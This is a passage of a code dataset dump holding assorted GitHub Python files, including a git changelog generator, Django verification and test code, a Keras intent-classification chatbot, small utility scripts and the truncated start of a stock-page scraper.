cli()","repo_name":"ngxbac/Kaggle-RSNA","sub_path":"src/preprocessing_3w.py","file_name":"preprocessing_3w.py","file_ext":"py","file_size_in_byte":5541,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"72"} +{"seq_id":"16585097467","text":"#!/usr/bin/env python3\n\nimport argparse\nimport os\nimport re\nimport sys\nfrom enum import Enum, auto\nfrom subprocess import PIPE, Popen\n\n\nclass Commit:\n\n def __init__(self, version_tag=None, commit_hash=None, commit_msg=None, commit_type=None, commit_category=None,\n commit_description=None):\n self.version_tag = version_tag\n self.commit_hash = commit_hash\n self.commit_msg = commit_msg\n self.commit_type = commit_type\n self.commit_category = commit_category\n self.commit_description = commit_description\n\n\nclass Type(Enum):\n BREAK = auto()\n BUILD = auto()\n DOCS = auto()\n FEAT = auto()\n FIX = auto()\n IMP = auto()\n MISC = auto()\n PERF = auto()\n REFAC = auto()\n TEST = auto()\n\n\ndef consent_overwrite():\n overwrite = input('Do you want to overwrite it? 
[Y/n]: ').upper()\n if overwrite == 'Y' or overwrite == '':\n return True\n elif overwrite == 'N':\n return False\n else:\n print('invalid input')\n return consent_overwrite()\n\n\nTYPE_TEXT = {\n Type.BREAK.name: 'Breaking Changes',\n Type.BUILD.name: 'Build and Dependency Changes',\n Type.DOCS.name: 'Documentation Changes',\n Type.FEAT.name: 'New Features',\n Type.FIX.name: 'Bugfixes',\n Type.IMP.name: 'Improvement of existing Features',\n Type.MISC.name: 'Miscellaneous',\n Type.PERF.name: 'Performance Improvements',\n Type.REFAC.name: 'Refactoring',\n Type.TEST.name: 'Tests'\n}\n\nCLOGG_VERSION = \"v1.4.0\"\nVERSION_PATTERN = re.compile('v?[0-9]+\\.[0-9]+\\.[0-9]+(-([0-9A-Za-z-]+(\\.[0-9A-Za-z-]+)*))?')\nTYPE_PATTERN = re.compile('^\\[[a-zA-Z]{3,5}\\]')\nCATEGORY_PATTERN = re.compile('\\[[a-zA-Z\\d\\ ]+\\]')\n\n# reading CLI arguments\nparser = argparse.ArgumentParser(prog='clogg',\n description=\"A simple CLI tool for generating changelogs\"\n \" from git commits and version tags.\")\n\nparser.add_argument('-v', action='store_true', help='return the installed version of clogg')\nparser.add_argument('-a', action='store_true', help='append the generated changelog to an existing file')\nparser.add_argument('-d', help='root directory of the git project, defaults to ./', metavar='', default=\"./\")\n# parser.add_argument('-e', help='version tag where the changelog should end', metavar='')\nparser.add_argument('-f', action='store_true', help='force override existing output file', default=False)\nparser.add_argument('-o', help='output for the changelog file, defaults to ./CHANGELOG.md', metavar='',\n default='./CHANGELOG.md')\nparser.add_argument('-c', action='store_true', help='enables ClogG footer at the end of the genrated changelog')\nparser.add_argument('-t', action='store_true', help='list all available tags and their descriptions')\nparser.add_argument('-p', action='store_true', help='enables prettifier to remove colons at the beginning of messages')\n# parser.add_argument('-s', help='version tag where teh changelog should start', metavar='')\n\nargs = parser.parse_args()\n\n# handling -v argument\nif args.v:\n print('clogg ' + CLOGG_VERSION)\n sys.exit(0)\n\nif args.t:\n tags = [t.name for t in Type]\n tags.sort()\n for tag in tags:\n print('\\033[36m'+ tag + '\\033[0m' + ':\\t' + TYPE_TEXT[tag])\n sys.exit(0)\n\n# changing working directory\ntry:\n os.chdir(args.d)\nexcept FileNotFoundError as e:\n print('error: directory ' + args.d + ' not found')\n sys.exit(1)\n\n# reading git log data\np = Popen(['git', 'log', '-E', '--format=@@DEC%d@@CMS %s@@CID %H@@CMD %b'], stdin=PIPE, stdout=PIPE,\n stderr=PIPE)\noutput, err = p.communicate()\n\n# handling git log errors\nif err:\n print('error: directory ' + os.getcwd() + ' is not a git repository')\n sys.exit(1)\n\noutput = output.decode('utf-8').split('@@')\n\n# parsing commits\ncommits = []\nversions = []\ncur_commit = Commit()\nfor entry in output:\n if entry[:3] == 'DEC':\n match = VERSION_PATTERN.search(entry)\n if match:\n cur_commit.version_tag = match.group(0)\n versions.append(match.group(0))\n elif entry[:3] == 'CMS':\n match = TYPE_PATTERN.search(entry[4:])\n if match:\n cur_commit.commit_type = match.group(0)[1:-1].upper()\n cur_commit.commit_msg = entry[4 + len(match.group(0)):].strip()\n if args.p:\n cur_commit.commit_msg = cur_commit.commit_msg.strip(':').strip()\n elif entry[:3] == 'CID':\n cur_commit.commit_hash = entry[4:]\n elif entry[:3] == 'CMD':\n match = CATEGORY_PATTERN.search(entry[4:])\n if match:\n 
cur_commit.commit_category = match.group(0)[1:-1].strip()\n cur_commit.commit_description = entry[4 + len(match.group(0)):].strip()\n else:\n cur_commit.commit_description = entry[4:].strip()\n if cur_commit.commit_type:\n commits.append(cur_commit)\n version_tag_tmp = cur_commit.version_tag\n cur_commit = Commit()\n cur_commit.version_tag = version_tag_tmp\n\n# check if changelog file exist and get consent to overwrite\nif os.path.exists(args.o) and not (args.f or args.a):\n print('the file ' + os.path.abspath(args.o) + ' already exists')\n if not consent_overwrite():\n sys.exit(0)\n\n# open changelog file\ntry:\n if args.a:\n changelog = open(args.o, 'a', -1)\n else:\n changelog = open(args.o, 'w', -1)\n changelog.write('# Changelog \\n\\n')\nexcept PermissionError:\n print('error: please make sure you have permission to edit ' + os.path.abspath(args.o))\n sys.exit(1)\n\nfor version in versions:\n changelog.write('## ' + version + ' \\n\\n')\n version_set = [n for n in commits if n.version_tag == version]\n for name in Type.__members__.keys():\n type_set = [n for n in version_set if n.commit_type == name]\n if len(type_set) > 0:\n changelog.write('### ' + TYPE_TEXT[name] + ' \\n\\n')\n for change in type_set:\n string = '- '\n if change.commit_category:\n string += '**' + change.commit_category + ':** '\n string += change.commit_msg.replace('\\n', '\\n >')\n string += ' (' + change.commit_hash[:7] + ') \\n'\n if change.commit_description:\n string += ' >' + change.commit_description + '\\n\\n'\n else:\n string += '\\n'\n changelog.write(string)\n\nif args.c :\n changelog.write('\\n \\n--- \\n This changelog was generated using [ClogG](https://github.com/0x4287/changelog-generator).')\n\nchangelog.close()\nprint('successfully created changelog at: ', os.path.abspath(args.o))\nsys.exit(0)\n","repo_name":"0x4287/changelog-generator","sub_path":"src/clogg.py","file_name":"clogg.py","file_ext":"py","file_size_in_byte":6734,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"31997662202","text":"categorias = (\n 'Pobreza',\n 'Hambre',\n 'Salud',\n 'Educación',\n 'Igualdad de Género',\n 'Agua',\n 'Energía',\n 'Economía',\n 'Infraestructura',\n 'Desigualdad',\n 'Ciudades',\n 'Consumo',\n 'Cambio Climatico',\n 'Océanos',\n 'Biodiversidad',\n 'Paz - Justicia ',\n 'Aliazas')\n\nCategorias = [\n ('Pobreza','Pobreza'),\n ('Hambre','Hambre'),\n ('Salud','Salud'),\n ('Educación','Educación'),\n ('Igualdad de Género','Igualdad de Género'),\n ('Agua','Agua'),\n ('Energía','Energía'),\n ('Economía','Economía'),\n ('Infraestructura','Infraestructura'),\n ('Desigualdad','Desigualdad'),\n ('Ciudades','Ciudades'),\n ('Consumo','Consumo'),\n ('Cambio Climatico','Cambio Climatico'),\n ('Océanos','Océanos'),\n ('Biodiversidad','Biodiversidad'),\n ('Paz - Justicia ','Paz - Justicia '),\n ('Aliazas','Aliazas')\n ]","repo_name":"MaregaAugusto/blog-django","sub_path":"blog/apps/utils/enum/categorias.py","file_name":"categorias.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"19886725461","text":"#序列化器\nfrom rest_framework import serializers\nfrom django_redis import get_redis_connection\nclass VerificationSerializer(serializers.Serializer):\n \"\"\"短息验证码序列化器\"\"\"\n\n #定义序列化字段\n #图片验证码\n text = serializers.CharField(max_length=4,min_length=4)\n #图片验证码的uuid\n image_code_id = serializers.UUIDField()\n\n # print(text,image_code_id)\n #定义校验器\n def 
validate(self, attrs):\n        \"\"\"验证图片验证码\"\"\"\n\n        #获取请求数据 获取用户输入的图片验证码\n        image_code_id = attrs.get('image_code_id')\n        print('222222%s'%image_code_id)\n        text = attrs.get('text')\n\n        #根据前端的图片验证码的uuid从redis数据库中查找对应验证码\n        #连接redis的图片验证码库\n        redis_conn = get_redis_connection('verification')\n        #获取真实的图片验证码 从数据库取出来的数据byte类型\n        try:\n            img_content = redis_conn.get('img_%s'% image_code_id).decode()\n        except:\n            raise serializers.ValidationError('请输入短信验证码')\n\n        #判断是否图片验证码是否过期\n        if not img_content:\n            raise serializers.ValidationError('图片验证码过期')\n\n        #删除redis数据库中的图片验证码\n        redis_conn.delete('img_%s'% image_code_id)\n\n        #校验用户输入的图片验证码\n        if text.lower() != img_content.lower():\n            print(text.lower(), img_content.lower())\n            raise serializers.ValidationError('图片验证码错误')\n\n        #用户手机号码是不是60秒内有发送的记录 限定一分钟内不能重复发短信验证码\n        #查询数据库有该用户手机号的发短信验证码记录\n        #获取用户手机号 通过序列器对象的上下文context获取视图对象 再根据视图对象获取视图的moblie参数\n        # kwargs 是序列化器帮助我们是自己实现的一个类字典的封装\n        # 视图对象初始化时将**kwargs的数据封装到kwargs类字典中\n        # 视图对象初始化时将*args的数据封装到args元组中\n        mobile = self.context['view'].kwargs['mobile']\n\n        #通过序列化器对象的context属性或取请求对象request,视图对象view,请求数据格式format\n        # print(self.context['view'])\n        # print(self.context['view'].kwargs)\n        # print(self.context['view'].args)\n        # print('...')\n        # print(self.context['request'])\n        # print(self.context['request'].data)\n        # print(self.context['request'].query_params)\n        # print('...')\n        # print(self.context['format'])\n        sms_send_flag = redis_conn.get(\"sms_send_flag_%s\"%mobile)\n\n        #检查用户的手机号是不是在一分钟内获取过短信验证码\n        if sms_send_flag:\n            raise serializers.ValidationError('请求次数过于频繁')\n\n\n        return attrs","repo_name":"wahello/project","sub_path":"meiduomall/meiduomall/meiduomall/apps/verifications/serializer.py","file_name":"serializer.py","file_ext":"py","file_size_in_byte":2958,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23484167365","text":"from sys import argv\r\nfrom os.path import exists\r\n\r\nscript, from_file, to_file = argv\r\n\r\nprint(f\"Copying from {from_file} to {to_file}\")\r\n\r\n# we could do these two on one line, how?\r\nin_file = open(from_file)\r\nindata = in_file.read()\r\n\r\n# New lines in the multi-line string AND \\n will give me two new lines (I only wanted one)\r\nprint(f\"\"\"\r\n    Some information:\\n\r\n    The input file is {len(indata)} bytes long\\n\r\n    Output file already exists--T or F: {exists(to_file)}\r\n    \"\"\")\r\n\r\n# So basically, in my mind, input() pauses a script at that point. 
So removing input() will allow the script to proceed uninterrupted.\r\n# print(\"Ready, hit RETURN to continue, CTRL-C to abort.\")\r\n# input()\r\n\r\nout_file = open(to_file, 'w')\r\nout_file.write(indata)\r\n\r\nout_file.close()\r\nin_file.close()\r\n","repo_name":"uwl-python-ig/lp3thw","sub_path":"ex17/bmr_ex17_sd1.py","file_name":"bmr_ex17_sd1.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36546301467","text":"import logging\nfrom typing import List\n\n# Commented this out as it was overriding debugging to info where I was calling this Utility Codes while debugging\n# logging.basicConfig(level=logging.INFO)\n\n\ndef printMatrix(matrix: List[List[int]], Rows: int = 0, Columns: int = 0, row: int = 0, column: int = 0) -> None:\n \"\"\"\n :param matrix: Matrix in the for of Array of Arrays\n :param Rows: Max Rows Available\n :param Columns: Max Columns Available\n :param row: From which row we have to print it\n :param column: From Which column we have to print it\n :return: None\n \"\"\"\n\n if Rows == 0 and Columns == 0:\n Rows, Columns = gettingRowColumn(matrix)\n\n if row > Rows and column > Columns:\n logging.info(\" Wrong Input Parameters. Please Try Again\")\n return\n\n logging.debug(\"Printing Matrix from row {} to Rows {} and column {} to Columns {} \".format(\n row, Rows, column, Columns\n ))\n\n for indexI in range(row, Rows):\n for indexJ in range(column, Columns):\n print(f'{matrix[indexI][indexJ]:03}', end=\" \")\n # print(\"{}\".format(matrix[indexI][indexJ], '03'), end=\" \")\n print()\n\n\ndef gettingRowColumn(matrix):\n rows = len(matrix)\n if rows:\n columns = len(matrix[0])\n else:\n columns = None\n\n return rows, columns\n\n","repo_name":"sakshamratra0106/PracticeProblems","sub_path":"DSAPracticeSheets/Matrix/MatrixUtility.py","file_name":"MatrixUtility.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37092495301","text":"a=open(r'C:\\Users\\prake\\Desktop\\AIML\\diabetes_data_upload.csv','r')\r\nb=a.readlines()\r\na.close()\r\nc=[]\r\nfor i in b:\r\n c.append(i.split(','))\r\nd={}\r\nfor i in c:\r\n if i[1] not in d.keys():\r\n d[i[1]]=1\r\n else:\r\n d[i[1]]+=1\r\nprint(d)\r\n\r\n##output:\r\n##{'Gender': 1, 'Male': 328, 'Female': 192}\r\n","repo_name":"Prakeerthi0538/AIML-Data_set","sub_path":"count_m_f.py","file_name":"count_m_f.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72844195752","text":"# Example 1\n\n# The main() function is defined. 
This is the entry point of the program.\ndef main():\n \n # The fahr_temps list is initialized with a set of Fahrenheit temperatures.\n fahr_temps = [72, 65, 71, 75, 82, 87, 68]\n\n # The Fahrenheit temperatures are printed using the print() function.\n # Print the Fahrenheit temperatures.\n print(f\"Fahrenheit: {fahr_temps}\")\n\n # Convert each Fahrenheit temperature to Celsius and store\n # the Celsius temperatures in a list named cels_temps.\n # An empty list cels_temps is created to store the Celsius temperatures.\n cels_temps = []\n \n # A for loop is used to iterate over each Fahrenheit temperature in fahr_temps.\n for fahr in fahr_temps:\n \n # Inside the loop, the cels_from_fahr() function is called to convert the Fahrenheit temperature to Celsius.\n cels = cels_from_fahr(fahr)\n \n # The converted Celsius temperature is appended to the cels_temps list using the append() method.\n cels_temps.append(cels)\n\n # Print the Celsius temperatures.\n # After the loop, the Celsius temperatures are printed using the print() function.\n print(f\"Celsius: {cels_temps}\")\n\n\ndef cels_from_fahr(fahr):\n \"\"\"Convert a Fahrenheit temperature to\n Celsius and return the Celsius temperature.\n \"\"\"\n # The cels_from_fahr(fahr) function is defined. It takes a Fahrenheit temperature as an argument and converts it to Celsius using the formula (fahr - 32) * 5 / 9. The result is rounded to one decimal place using the round() function.\n cels = (fahr - 32) * 5 / 9\n return round(cels, 1)\n\n\n# Call main to start this program.\nif __name__ == \"__main__\":\n \n # Finally, the main() function is called to start the program.\n main()\n \n","repo_name":"djhi12/programming_with_functions","sub_path":"week6/example_1.py","file_name":"example_1.py","file_ext":"py","file_size_in_byte":1767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36509868285","text":"from django.test import TestCase, Client\nfrom django.contrib.auth.models import User\nfrom django.urls import reverse\nfrom rest_framework.test import APITestCase\nfrom .views import NO_TAGS_ERROR_MSG, BAD_FILE_ERROR_MSG, CLOUDINARY_ERROR\n\nimport cloudinary\nfrom PIL import Image\n\nimport cloudinary\n\nimport os\nimport io\n\nTEST_IMAGES_DIR = 'imageprocessor/tagservice/test_images'\n\n\n# Create your tests here.\nclass ViewTests(TestCase):\n def test_view_initialized_successfully(self):\n self.assertTrue(True)\n\n def test_index_view(self):\n client = Client()\n response = client.get(\"/\")\n self.assertTrue(response.status_code == 200)\n\n def test_classify_view(self):\n client = Client()\n response = client.get(\"/classify/\")\n self.assertTrue(response.status_code == 200)\n\n def test_tag_search(self):\n client = Client()\n response = client.get(\"/tagsearch/\")\n self.assertTrue(response.status_code == 200)\n\n def test_tag_search__tagged_pictures(self):\n client = Client()\n response = client.get(\"/tagsearch/tagged_pictures/\")\n self.assertTrue(response.status_code == 200)\n\n def test_register_page(self):\n client = Client()\n response = client.get(reverse('register'))\n self.assertTrue(response.status_code == 200)\n\n def test_not_logged_in_user_cannot_view_my_pictures(self):\n client = Client()\n response = client.get(reverse('view_my_pictures'))\n self.assertTrue(response.status_code == 302)\n\n def test_logged_in_user_can_view_my_pictures(self):\n client = Client()\n client.post(reverse('register'),{'username': \"TestUser1\", 'password1': \"testpassword1\", 'password2': 
\"testpassword1\"})\n client.login(username=\"TestUser1\", password=\"testpassword1\")\n response = client.get(reverse('view_my_pictures'))\n self.assertTrue(response.status_code == 200)\n\n def test_view_my_pictures_picture_count(self):\n client = Client()\n response = client.post(reverse('register'),{'username': \"TestUser1\", 'password1': \"testpassword1\", 'password2': \"testpassword1\"})\n client.login(username=\"TestUser1\", password=\"testpassword1\")\n images_to_upload = 5\n for i in range(images_to_upload):\n with open(TEST_IMAGES_DIR + \"/image1.jpg\", \"rb\") as file:\n client.post(reverse('classify'), {'file': file})\n response = client.get(reverse('view_my_pictures'))\n self.assertEqual(len(response.context['my_pictures']) ,images_to_upload)\n for picture in response.context['my_pictures']:\n self.assertTrue('dog' in picture.get_tags().values_list('tag', flat=True))\n\n def test_results_page_shows_image(self):\n client = Client()\n with open(TEST_IMAGES_DIR + \"/image1.jpg\", \"rb\") as file:\n response = client.post(reverse('classify'), {'file': file})\n self.assertIsNotNone(response.context['results'][0]['url'])\n self.assertTrue('dog' in response.context['results'][0]['tags'])\n\n def test_results_page_shows_image_should_error(self):\n client = Client()\n with open(TEST_IMAGES_DIR + \"/image4_should_error.jpg\", \"rb\") as blankImageFile:\n response = client.post(reverse('classify'), {'file': blankImageFile})\n self.assertIsNotNone(response.context['results'][0]['url'])\n self.assertIsNone(response.context['results'][0]['tags'])\n\n def test_results_page_shows_images(self):\n client = Client()\n with open(TEST_IMAGES_DIR + \"/image1.jpg\", \"rb\") as file1, open(TEST_IMAGES_DIR + \"/image4_should_error.jpg\", \"rb\") as file2:\n response = client.post(reverse('classify'), {'file': [file1, file2]})\n self.assertIsNotNone(response.context['results'][0]['url'])\n self.assertIsNotNone(response.context['results'][1]['url'])\n self.assertTrue('dog' in response.context['results'][0]['tags'])\n self.assertTrue(response.context['results'][1]['tags'] == [])\n\n def test_tag_search_post_request_works(self):\n client = Client()\n response = client.post(\"/tagsearch/\", {'tagsearch': ['dog']})\n self.assertTrue(response.status_code == 200)\n self.assertTrue(response.context['search_result'].get(\"total_count\") >= 1)\n\n def test_post_same_image_with_different_name(self):\n client = Client()\n with open(TEST_IMAGES_DIR + \"/image5.jpg\", \"rb\") as file1, open(TEST_IMAGES_DIR + \"/same_as_image5.jpg\", \"rb\") as file2:\n response = client.post(reverse('classify'), {'file': [file1, file2]})\n query = 'resource_type:image AND public_id=' + 'a2324d47504d07607aaae43d7be708c0'\n search_query_result = cloudinary.Search().expression(query).execute()\n print(search_query_result[\"total_count\"])\n self.assertEqual(search_query_result[\"total_count\"], 1)\n\n #this cleans up the test images after the tests in this class are run\n @classmethod\n def tearDownClass(cls):\n delete_test_images()\n\nclass LoginTests(TestCase):\n def test_register_creates_new_user(self):\n original_user_count = User.objects.all().count()\n client = Client()\n response = client.post(reverse('register'),{'username': \"TestUser1\", 'password1': \"testpassword1\", 'password2': \"testpassword1\"})\n self.assertEqual(response.status_code,302)\n # checking that the count of users has increase by one from original\n self.assertEqual(original_user_count + 1, User.objects.all().count())\n\n def 
test_new_user_able_to_login(self):\n client = Client()\n response = client.post(reverse('register'),{'username': \"TestUser1\", 'password1': \"testpassword1\", 'password2': \"testpassword1\"})\n self.assertTrue(client.login(username=\"TestUser1\", password=\"testpassword1\"))\n\nclass ClassifyApiTests(APITestCase):\n\n def test_classify_api_no_image(self):\n response = self.client.post(\"/api/classify/\")\n self.assertEqual(response.status_code, 400)\n\n def test_classify_api_cat_and_dog(self):\n with open(os.path.join(TEST_IMAGES_DIR,\"image3.jpg\"), \"rb\") as file:\n response = self.client.post(\"/api/classify/\", {'file': file}, format='multipart') \n self.assertEqual(response.status_code, 207)\n result = response.data['results'][0]\n self.assertEqual(result['status'], 200)\n self.assertIsNone(result['error_message'])\n self.assertEqual(result['name'], 'image3.jpg')\n self.assertIsNotNone(result['url'])\n self.assertIsNotNone(result['public_id'])\n self.assertIn('cat', result['tags'])\n self.assertIn('dog', result['tags'])\n\n def test_classify_api_muliple_images(self):\n with open(os.path.join(TEST_IMAGES_DIR,\"image3.jpg\"), \"rb\") as file1, open(os.path.join(TEST_IMAGES_DIR,\"image2.jpg\"), \"rb\") as file2:\n response = self.client.post(\"/api/classify/\", {'file': [file1, file2]}, format='multipart')\n self.assertEqual(response.status_code, 207)\n \n result = response.data['results'][0]\n self.assertEqual(result['status'], 200)\n self.assertIsNone(result['error_message'])\n self.assertEqual(result['name'], 'image3.jpg')\n self.assertIsNotNone(result['url'])\n self.assertIsNotNone(result['public_id'])\n self.assertIn('cat', result['tags'])\n self.assertIn('dog', result['tags'])\n\n result = response.data['results'][1]\n self.assertEqual(result['status'], 200)\n self.assertIsNone(result['error_message'])\n self.assertEqual(result['name'], 'image2.jpg')\n self.assertIsNotNone(result['url'])\n self.assertIsNotNone(result['public_id'])\n self.assertIn('kite', result['tags'])\n self.assertIn('person', result['tags'])\n\n def test_classify_api_no_content(self):\n with open(os.path.join(TEST_IMAGES_DIR,\"image4_should_error.jpg\"), \"rb\") as file:\n response = self.client.post(\"/api/classify/\", {'file': file}, format='multipart')\n self.assertEqual(response.status_code, 207)\n result = response.data['results'][0]\n self.assertEqual(result['status'], 204)\n self.assertEqual(result['error_message'], NO_TAGS_ERROR_MSG)\n self.assertEqual(result['name'], 'image4_should_error.jpg')\n self.assertIsNone(result['public_id'])\n self.assertIsNone(result['url'])\n self.assertFalse(result['tags'])\n\n def test_classify_api_unsupported_media(self):\n with io.StringIO(\"This is not a file\") as file:\n response = self.client.post(\"/api/classify/\", {'file': file}, format='multipart')\n self.assertEqual(response.status_code, 207)\n result = response.data['results'][0]\n self.assertEqual(result['status'], 415)\n self.assertEqual(result['error_message'], BAD_FILE_ERROR_MSG)\n self.assertEqual(result['name'], 'file')\n self.assertIsNone(result['public_id'])\n self.assertIsNone(result['url'])\n self.assertFalse(result['tags'])\n\n #this cleans up the test images after the tests in this class are run\n @classmethod\n def tearDownClass(cls):\n delete_test_images()\n\n#helper function\ndef delete_test_images():\n 
cloudinary.api.delete_resources_by_prefix('TEST_IMAGES/')","repo_name":"PhotoTagger/django-initial","sub_path":"imageprocessor/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":9268,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"26342491250","text":"from abc import ABCMeta, abstractmethod\r\nfrom pyvi import ViTokenizer, ViPosTagger\r\nfrom .texttospeech import texttospeech\r\nimport random\r\nimport json\r\nimport pickle\r\nimport numpy as np\r\nimport os\r\n\r\nfrom pathlib import Path\r\nBASE_DIR = Path(__file__).resolve().parent.parent\r\n#import nltk\r\n#from nltk.stem import WordNetLemmatizer\r\n\r\nfrom tensorflow.keras.models import Sequential\r\nfrom tensorflow.keras.layers import Dense, Dropout\r\nfrom tensorflow.keras.optimizers import SGD\r\nfrom tensorflow.keras.models import load_model\r\n\r\nclass IAssistant(metaclass=ABCMeta):\r\n\r\n @abstractmethod\r\n def train_model(self):\r\n \"\"\" Implemented in child class \"\"\"\r\n\r\n @abstractmethod\r\n def request(self, message):\r\n \"\"\" Implemented in child class \"\"\"\r\n\r\nclass GenericAssistant(IAssistant):\r\n def __init__(self, intents, intent_methods={}, model_name=\"assistant_model\"):\r\n self.intents = intents\r\n self.intent_methods = intent_methods\r\n self.model_name = model_name\r\n\r\n if intents.endswith(\".json\"):\r\n self.load_json_intents(intents)\r\n\r\n #self.lemmatizer = WordNetLemmatizer()\r\n\r\n def load_json_intents(self, intents):\r\n with open(intents, 'r', encoding='utf-8') as f:\r\n self.intents = json.loads(f.read())\r\n\r\n def train_model(self):\r\n\r\n self.words = []\r\n self.classes = []\r\n documents = []\r\n ignore_letters = ['!', '?', ',', '.']\r\n\r\n for intent in self.intents['intents']:\r\n for pattern in intent['patterns']:\r\n word = ViTokenizer.tokenize(pattern)\r\n self.words.extend(word)\r\n documents.append((word, intent['tag']))\r\n if intent['tag'] not in self.classes:\r\n self.classes.append(intent['tag'])\r\n\r\n #self.words = [self.lemmatizer.lemmatize(w.lower()) for w in self.words if w not in ignore_letters]\r\n self.words = sorted(list(set(self.words)))\r\n\r\n self.classes = sorted(list(set(self.classes)))\r\n \r\n training = []\r\n output_empty = [0] * len(self.classes)\r\n\r\n for doc in documents:\r\n bag = []\r\n word_patterns = doc[0]\r\n #word_patterns = [self.lemmatizer.lemmatize(word.lower()) for word in word_patterns]\r\n for word in self.words:\r\n bag.append(1) if word in word_patterns else bag.append(0)\r\n\r\n output_row = list(output_empty)\r\n output_row[self.classes.index(doc[1])] = 1\r\n training.append([bag, output_row])\r\n\r\n random.shuffle(training)\r\n training = np.array(training)\r\n\r\n train_x = list(training[:, 0])\r\n train_y = list(training[:, 1])\r\n\r\n self.model = Sequential()\r\n self.model.add(Dense(128, input_shape=(len(train_x[0]),), activation='relu'))\r\n self.model.add(Dropout(0.5))\r\n self.model.add(Dense(64, activation='relu'))\r\n self.model.add(Dropout(0.5))\r\n self.model.add(Dense(len(train_y[0]), activation='softmax'))\r\n\r\n sgd = SGD(lr=0.01, decay=1e-6, momentum=0.9, nesterov=True)\r\n self.model.compile(loss='categorical_crossentropy', optimizer=sgd, metrics=['accuracy'])\r\n\r\n self.hist = self.model.fit(np.array(train_x), np.array(train_y), epochs=200, batch_size=5, verbose=1)\r\n\r\n def save_model(self, model_name=None):\r\n if model_name is None:\r\n self.model.save(os.path.join(BASE_DIR,f\"{self.model_name}.h5\", 
))  # Model.save() takes only the file path; the training history is already kept in self.hist\r\n            pickle.dump(self.words, open(os.path.join(BASE_DIR, f'{self.model_name}_words.pkl'), 'wb'))  # keep paths consistent with load_model()\r\n            pickle.dump(self.classes, open(os.path.join(BASE_DIR, f'{self.model_name}_classes.pkl'), 'wb'))\r\n        else:\r\n            self.model.save(os.path.join(BASE_DIR,f\"{model_name}.h5\"))\r\n            pickle.dump(self.words, open(os.path.join(BASE_DIR,f'{model_name}_words.pkl'), 'wb'))\r\n            pickle.dump(self.classes, open(os.path.join(BASE_DIR,f'{model_name}_classes.pkl'), 'wb'))\r\n\r\n    def load_model(self, model_name=None):\r\n        if model_name is None:\r\n            self.words = pickle.load(open(os.path.join(BASE_DIR,f'{self.model_name}_words.pkl'), 'rb'))\r\n            self.classes = pickle.load(open(os.path.join(BASE_DIR,f'{self.model_name}_classes.pkl'), 'rb'))\r\n            self.model = load_model(os.path.join(BASE_DIR,f'{self.model_name}.h5'))\r\n        else:\r\n            self.words = pickle.load(open(os.path.join(BASE_DIR,f'{model_name}_words.pkl'), 'rb'))\r\n            self.classes = pickle.load(open(os.path.join(BASE_DIR,f'{model_name}_classes.pkl'), 'rb'))\r\n            self.model = load_model(os.path.join(BASE_DIR,f'{model_name}.h5'))\r\n\r\n    def _clean_up_sentence(self, sentence):\r\n        sentence_words = ViTokenizer.tokenize(sentence)\r\n        #sentence_words = [self.lemmatizer.lemmatize(word.lower()) for word in sentence_words]\r\n        return sentence_words\r\n    # function _bag_of_words: return an array {0,1} of an user's sentence showing the frequency of these words\r\n    def _bag_of_words(self, sentence, words): \r\n        sentence_words = self._clean_up_sentence(sentence)\r\n        bag = [0] * len(words)\r\n        for s in sentence_words:\r\n            for i, word in enumerate(words):\r\n                if word == s:\r\n                    bag[i] = 1\r\n        return np.array(bag)\r\n\r\n    def _predict_class(self, sentence):\r\n        p = self._bag_of_words(sentence, self.words)\r\n        res = self.model.predict(np.array([p]))[0]\r\n        ERROR_THRESHOLD = 0.1\r\n        results = [[i, r] for i, r in enumerate(res) if r > ERROR_THRESHOLD]\r\n\r\n        results.sort(key=lambda x: x[1], reverse=True)\r\n        return_list = []\r\n        for r in results:\r\n            return_list.append({'intent': self.classes[r[0]], 'probability': str(r[1])})\r\n        return return_list\r\n\r\n    def _get_response(self, ints, intents_json):\r\n        try:\r\n            tag = ints[0]['intent']\r\n            list_of_intents = intents_json['intents']\r\n            for i in list_of_intents:\r\n                if i['tag'] == tag:\r\n                    result = random.choice(i['responses'])\r\n                    break\r\n        except IndexError:\r\n            result = \"I don't understand!\"\r\n        return result\r\n\r\n    def request(self, message):\r\n        ints = self._predict_class(message)\r\n        print(\"Xuất ints: \", ints, \" và ints[0]['intent']: \" , ints[0]['intent'])\r\n        if ints[0]['intent'] in self.intent_methods.keys():\r\n            print(\"Đây là:\" ,self.intent_methods.keys())\r\n            self.intent_methods[ints[0]['intent']]()\r\n            resp = \"Đã thực hiện theo yêu cầu\"\r\n            print(\"dừng lại ở đây\")\r\n        else:\r\n            resp = self._get_response(ints, self.intents)\r\n        texttospeech(resp)\r\n        print(\"Trợ lí ảo: \" + resp)\r\n        return resp","repo_name":"tam2k1/my-repository","sub_path":"home/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38846942978","text":"from bs4 import BeautifulSoup\nfrom urllib import request as req\nimport pandas as pd\n\n# 웹 브라우저 정보 및 웹 스크랩핑할 url\nheaders = (\"user-agent\", \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36\")\nurl = 'https://finance.naver.com/item/sise_day.naver?code=005930'\n\n# request 라이브러리를 통해 url을 열 때마다 웹 브라우저 정보 제공\nopener = 
